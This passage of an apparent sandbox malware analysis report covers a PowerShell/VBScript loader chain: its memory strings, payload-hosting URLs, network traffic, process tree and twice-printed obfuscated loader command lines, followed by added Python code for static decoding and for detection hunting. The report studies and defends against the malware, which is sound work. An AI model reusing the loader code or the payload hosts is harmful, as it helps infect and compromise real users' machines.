          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000000.00000002.1737765751.0000022A2ADB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14B84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A12C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EA31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A13852000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smip
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A14706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinznvapplznvtznvch.aznv/na/mg.vbs
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknown | HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.9:49709 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.9:49710 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.9:49711 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.9:49713 version: TLS 1.2

          System Summary

          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8173
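          Two string-obfuscation schemes are visible in this report and can be undone statically, without running anything. In the first stage (cu.ps1) every 'e' in a string literal is stored as the token "znv" and put back at runtime: compare the fornid.com and pineappletech.ae URL pairs in the memory-strings list above. In the second stage (the 8173-byte command line wscript.exe passes to powershell.exe) the function gaardspladsens keeps one character out of every six, starting at index 5, so every real character sits behind five junk characters; the slice width is $Bellisserne, which is only incremented when $host.CurrentCulture is set, so on a host where that property is empty every literal decodes to the empty string and the rest of the script is a no-op. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it re-implements both decoders, adds an encoder so a test literal can be built, and pulls every gaardspladsens literal out of a captured command line. One caveat: the rendered report collapses runs of spaces, so the literals as displayed on this page are lossy (decoding the displayed $Cometlike literal does not reproduce the "echo %appdata%\Succesfulde.blo && echo t" line recorded at process creation); decode from the raw command line captured by the sandbox, not from the HTML. The junk alphabet in the encoder and the constructed sample command line are assumptions.

```python
"""Static decoders for the two string-obfuscation schemes this report shows.

Added example; it is not part of the Joe Sandbox report or of the sample.
  stage 1 (cu.ps1): every 'e' in a string literal is stored as "znv" and
      restored at runtime (see the fornid.com and pineappletech.ae URL pairs
      in the memory-strings list).
  stage 2 (the command line wscript.exe passes to powershell.exe): the
      function gaardspladsens() keeps one character out of every six,
      starting at index 5, so each real character follows five junk chars:
      For ($i=5; $i -lt ($s.Length-1); $i+=6) { $out += $s.Substring($i,1) }
      The slice width is $Bellisserne, which is only incremented when
      $host.CurrentCulture is set; otherwise every literal decodes to "".
"""
import random
import re
from typing import List

STAGE1_TOKEN = "znv"
# Matches the obfuscated literals as they appear in the captured command line.
STAGE2_CALL = re.compile(r"gaardspladsens\s+'([^']*)'")


def decode_stage1(s: str) -> str:
    """Undo the 'e' -> 'znv' substitution used by the first stage."""
    return s.replace(STAGE1_TOKEN, "e")


def decode_stage2(s: str, start: int = 5, step: int = 6, width: int = 1) -> str:
    """Re-implementation of gaardspladsens(): keep `width` characters every
    `step` characters from `start`, stopping before len(s) - width exactly as
    the PowerShell loop does (so a real character in the final slot is dropped,
    which is why the sample's trailing junk space never reaches the output)."""
    return "".join(s[i:i + width] for i in range(start, len(s) - width, step))


def decode_command_line(cmdline: str) -> List[str]:
    """Decode every gaardspladsens '...' literal found in a captured command line."""
    return [decode_stage2(lit) for lit in STAGE2_CALL.findall(cmdline)]


def encode_stage2(plain: str, seed: int = 1) -> str:
    """Build a stage-2 style literal for testing: five junk characters before
    each real one, plus one trailing junk character so the loop bound above
    still reaches the last real character.  The junk alphabet is an assumption;
    the sample uses fragments of Danish words, which decode identically."""
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ,."
    junk = lambda n: "".join(rng.choice(alphabet) for _ in range(n))
    return "".join(junk(5) + c for c in plain) + junk(1)


# Constructed inputs.  The two stage-1 pairs are copied from the report's
# memory-strings list; the stage-2 command line is built here with encode_stage2.
STAGE1_PAIRS = {
    "https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf":
        "https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf",
    "https://www.pinznvapplznvtznvch.aznv/na/mg.vbs":
        "https://www.pineappletech.ae/na/mg.vbs",
}
SAMPLE_PLAIN = "echo %appdata%\\Succesfulde.blo && echo t"
SAMPLE_CMDLINE = ("cls;$Cometlike = gaardspladsens '" + encode_stage2(SAMPLE_PLAIN)
                  + "';$Deaktiverende=gaardspladsens '" + encode_stage2("> ") + "';")

if __name__ == "__main__":
    for enc, expected in STAGE1_PAIRS.items():
        print(decode_stage1(enc) == expected, decode_stage1(enc))
    print(decode_command_line(SAMPLE_CMDLINE))
```

Calling decode_stage2 with width=0 reproduces what the script does when $host.CurrentCulture is empty: every literal comes back as the empty string, which is the cheap host check the loader gets for free from its own decoder.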
          Source: classification engine | Classification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\List of Required items and services.pdf
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqytk0t0.xf5.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: cu.ps1 | ReversingLabs: Detection: 31%
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
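          The process tree above is the chain the Sigma-style signatures in this report key on: powershell.exe spawns a hidden-window powershell.exe that evaluates a path under %public%, that one launches wscript.exe on C:\Users\Public\tq5.vbs, wscript.exe starts powershell.exe with an 8173-byte obfuscated command line, and that stage probes an %appdata% path through cmd.exe. Note that the first entry, with an unknown parent and -ExecutionPolicy unrestricted -file cu.ps1, is how the sandbox launches a .ps1 sample, so that flag belongs to the analysis harness rather than to the malware. The Python below is an added example, not part of the Joe Sandbox report: a small hunt that evaluates process-creation records with Sysmon Event ID 1 field names (Image, ParentImage, CommandLine) against the chain's features. The field names, the length threshold, the folder list and the constructed events are assumptions; the 8173-byte command line is replaced by a stand-in of similar length.

```python
"""Hunt for the execution chain in this report in Sysmon-style process
creation records.  Added example, not part of the Joe Sandbox report.

Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the
events below are constructed to mirror the report's process tree, the length
threshold and the folder list are assumptions, and the 8173-byte command line
is replaced by a stand-in of similar length.
"""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SUSPICIOUS_SCRIPT_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\programdata\\")
LONG_CMDLINE = 4096   # assumption; the report's wscript-spawned powershell.exe had 8173 bytes

# -ep/-ex/-exec/-executionpolicy are the unambiguous prefixes PowerShell accepts;
# a bare -e is left out because it also prefixes -EncodedCommand.
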